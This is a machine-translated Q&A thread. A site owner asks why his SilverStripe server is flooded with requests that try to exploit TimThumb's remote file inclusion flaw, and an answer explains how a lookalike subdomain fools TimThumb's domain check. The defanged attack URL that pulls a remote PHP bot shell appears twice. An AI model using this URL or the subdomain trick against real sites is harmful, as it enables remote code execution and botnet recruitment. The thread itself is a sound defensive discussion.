2

私のサーバー (mediaquarter.at) は現在、次のようなリクエストによって DDoS 攻撃を受けています (若干の違いがあります): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/ timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL は「非アクティブ化」されているため、誰も誤ってクリックすることはありません)

参照されている PHP ファイルをダウンロードしようとする場合は注意してください: preg_replace では /e スイッチがアクティブになっており、コードには複数の eval ステートメントが含まれています。確認する前にクリーンアップしてください。pBot のように見えます。詳細については、http ://www.offensivecomputing.net/?q=node/1417 を参照してください。

TimThumb は、リモート ファイル インクルージョンに対して脆弱です (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/)。ワードプレス。したがって、悪用するために hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php を呼び出す誰かを理解できます。脆弱性。

しかし、別の Web サイト (mediaquarter.at) 経由で呼び出そうとすると、404 エラー メッセージが表示されるだけで、何の意味があるのでしょうか。さらに、私のサーバーは WordPress を実行していませんが、代わりに SilverStripe を実行しているため、これはかなり無意味に思えます。

これは単なるエラー/攻撃者側の愚かさですか、それともここである種の攻撃ベクトルを見落としていますか?

PS: サーバーは安価な Web ホスティングにすぎず、まったくアクセスできないため、システムに変更があるかどうかを確認できません。

4

1 に答える 1

2

timthumb.php ファイルを持っていない場合は、脆弱ではありません。これは非常にエキゾチックな脆弱性であり、(これまでのところ) その種類の 1 つであるため、私は詳細に調査しました。攻撃者の観点 から書かれたエクスプロイトを読む必要があります。

つまり、youtube.com や blogger.com などの「信頼できる」Web サイトからの画像をキャッシュします。ただし、この正規表現は記述が不十分で、文字列の末尾にバインドされていません。サブドメインを変更して、この正規表現チェックをだますのは簡単です。これが、攻撃者のドメイン名がblogger.com.midislandrental.com.

あなたが DDoS 攻撃を受けている理由は、timthumb.php のフェッチが 404 を返さないか、timthumb.php を介して拡散している大規模なボットネットがあなたを脆弱であると誤ってフィンガープリントしている可能性があります。脆弱なホストを見つけようとしているボットの Google Dork に表示される可能性があります。

于 2011-12-14T02:37:43.680 に答える